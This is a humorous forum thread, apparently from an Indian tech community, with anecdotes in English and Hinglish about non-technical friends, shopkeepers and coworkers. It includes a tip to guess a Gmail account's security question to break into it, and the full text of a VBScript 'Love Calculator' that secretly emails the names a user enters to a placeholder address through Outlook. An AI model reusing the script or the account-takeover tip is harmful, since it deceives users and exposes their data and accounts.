Encounter with Noobs !!!!

Story of my father:

I left my old PC from college at home and my father use to play solitaire, hearts etc on it or watches cd/dvd occasionally.

It had XP and its bound to crash after sometime - and there's goes mine.

Since I wasn't home, father called some local 'mechanic' guy and shown him the problem.

Dunno what did the guy saw, but after watching sometime he came to a conclusion that "It got One VIRUS. and system need a format" (format is a colloquial of re-installation of OS :p)

And that was shocker for my father - till then for him a virus meant that disease creating cellular thing (bacteria-virus-amoeba etc etc).

Later he called me to know if that guy was correct about the virus thing.

Well in this case the Noob is myself. Its around 5yrs ago when I was a comp nerd.

I was getting a new CPU stuff and my vendor was putting the Corsair RAM.

And I bumped up saying ye kaunsi farzi company ki ram laga rahe ho bhaiya, kabhi naam bhi nahi suna.. Transcend nahi hai kya

{which sucking company ram is this, never heard the name, dont U have transcend}... He ended up with a pale face saying, abhi to yahi hai beta :p

Can say the same for me about 10yrs ago. At that time AMD was unknown and Intel was like AMD is hot, blah .....

Infact, as of 2 years ago, told my friend to get AMD. His father is like, I will give money only for Intel. Best part? They bought a LGA775 platform system. :lol:

I second that... most of the budget systems my acquaintances bought had Intel boards.. and they boasted of the features it gave :|

djmykey said:
I second that... most of the budget systems my acquaintances bought had Intel boards.. and they boasted of the features it gave :|

Never understood whats wrong with Intel boards.

If you arent overclocking, what is it that 3rd party boards offer that Intel boards dont

mehrotra.akash said:
Never understood whats wrong with Intel boards.

If you arent overclocking, what is it that 3rd party boards offer that Intel boards dont

Now, Intel is leader in both mid range and high end. During the days of LGA775, Intel could compete on the performance front, but on the price to performance, they lost in low end/mid range.

Code:
Stupid Guy: abey oye

Me: kya?

Stupid Guy: office mein hai??

Me: na

ghar

Stupid Guy: ek help chahiye

Me: kya?

Stupid Guy: gmail kaise hack hota hai??

Me: lol...pata nahi yaar...koi bhi hack kar leta to google out of buisness ho jati kab ki

Stupid Guy: but yaar log karte hain.. net pe check karke bta na.. tere ko to iska thoda bahut idea bhi hai.. zaruri tha

Me: bhai net to tere paas bhi hai...tu bhi kar sakta hai....:-D

Seriously , password nahi pata to Security question try kar...that's the best possiblity

Stupid Guy: chal koi nai.. thanks anyways..

Me: ok

Not very funny, but made me LOL when he asked the question !! Hehe..

eggman said:
Not very funny, but made me LOL when he asked the question !! Hehe..

Exact same thing happened with me. My friend called me at midnight and ask the same stupid question. lol.

^^ This thing happens to the Cyber Cafe owners a lot.. If a chick comes to access internet; all the langoors used to flock asking, uska email ID kya hain.. uska password bata na..

Ya right.. let me see if I can find the note where she wrote it down for me
<

My friend wanted to buy an Android phone for himself within 10k.. I went to shop, he showed me some phones, Galaxy Fit was one of them. I was acting like I am a noob. I asked him to explain me some features. He told me to wait for couple of minutes. He got the box and started reading features present on that box. He was like

"Ye badhiya mobile hai, 260 ka RAM ata hai. 600 ka processor, bada display aur touchscreen high tech hai, dabana nahi pdta, gprs to broadband se bhi fast hai ispe. android market pe hum applications supply krte hai apne shop ke users ke liye special wo download krke denge free me. Android hai isme."
I stopped him and asked "ye 260 ka RAM aur 600 ka processor kya hai bhaiya", he replied, "wo technology hoti hai 260mb ka RAM games ke liye aur **600mb** ka processor phone ke liye"

I asked him another question "ye android ka funda kya hai?" he replied, "android samsung ka naya software hai, mobile fast hota hai usase, nokia ke jaisa hang nahi hota. games bhi computer ki chalti hai uspe, aap lelo, hum aapko free me games de denge,"

I was like
<
How iliterate people are
<

My friend wanted to buy an Android phone for himself within 10k.. I went to shop, he showed me some phones, Galaxy Fit was one of them. I was acting like I am a noob. I asked him to explain me some features. He told me to wait for couple of minutes. He got the box and started reading features present on that box. He was like

"Ye badhiya mobile hai, 260 ka RAM ata hai. 600 ka processor, bada display aur touchscreen high tech hai, dabana nahi pdta, gprs to broadband se bhi fast hai ispe. android market pe hum applications supply krte hai apne shop ke users ke liye special wo download krke denge free me. Android hai isme."

I stopped him and asked "ye 260 ka RAM aur 600 ka processor kya hai bhaiya", he replied, "wo technology hoti hai 260mb ka RAM games ke liye aur **600mb** ka processor phone ke liye"

I asked him another question "ye android ka funda kya hai?" he replied, "android samsung ka naya software hai, mobile fast hota hai usase, nokia ke jaisa hang nahi hota. games bhi computer ki chalti hai uspe, aap lelo, hum aapko free me games de denge,"

I was like
<
How iliterate people are
<

Funny thing is, the shopkeeper would have been thinking the same about u
<

Oh yeah????

How about an Audi R8 for passing BTech in first attempt?? ehh?? ehh??

<
Some people seem to have all the luck.

I was like
<
How iliterate people are
<

WTF. These guys supply games to the Android Market?
<

#Rahulrulez, I am copying your content on FB
<

I was like
<
How iliterate people are
<

I am gonna lol on this the whole day....

and BTW mujhe bhi pass on kar dena thode games... is gareeb ko bhi games ka maza lene do
<
<
<

Many such cases hppen with me.

I told one of my friend that I got a new gaming pc with an 8800gt 512mb and told him that the card costs 14k and he "said arrey maine toh 512mb ka card 3k mein liya,tere koh toh dealer ne loot liya"

I tried to explain him about the difference but he would not listen.

same happens with me. my friends are noobs when it comes to computers.

i make there pc's for them but they tell me to make there pc as powerful as mine but are not willing to shell out more money and cant understand difference. for them performance for all quad core processor is same
<

today morning in the office, opened outlook just to find one of the new joinee guy in the team forwarding some 'crap' with subject - "Love Calculator". It was a VBScript - which while opened asks for Your name and your crush - and suppose to calculate love % (duh!!).

But it actually forwards the names entered to some "email id" via outlook.

And that idiot didn't changed the email id (from what he might had received and got fooled) to his email.

Next mail comes - "do not open the sript"

Another annoying mail came - "with enhanced script" (this time with his email)

I cannot really block/spam this guy being the same project - bloody idiot.

The script.

Set WshShell = WScript.CreateObject("WScript.Shell")

a= Inputbox ("Enter your name")

b=Inputbox("Enter your crush's name")

MsgBox("Calculation in Progress")

MsgBox("Press OK for this message and Close your eyes for a Minute")

WshShell.Run "Outlook"

WScript.Sleep 2500 ' Give Notepad some time to load

WshShell.SendKeys "^{n}"

WScript.Sleep 1000

WshShell.SendKeys "abcd@xyz.com"

WshShell.SendKeys "{TAB}"

WshShell.SendKeys "Love Calculation "

WScript.Sleep 1000

WshShell.SendKeys a

WshShell.SendKeys " Loves "

WshShell.SendKeys b

WshShell.SendKeys "%{s}"

WshShell.SendKeys "%{s}"

today morning in the office, opened outlook just to find one of the new joinee guy in the team forwarding some 'crap' with subject - "Love Calculator". It was a VBScript - which while opened asks for Your name and your crush - and suppose to calculate love % (duh!!).

But it actually forwards the names entered to some "email id" via outlook.

And that idiot didn't changed the email id (from what he might had received and got fooled) to his email.

Next mail comes - "do not open the sript"

Another annoying mail came - "with enhanced script" (this time with his email)

I cannot really block/spam this guy being the same project - bloody idiot.

This happened with me once... I entered no one and no one
<
The guy who sent that webpage link to me went meh.. yeh to useless hain
<

Back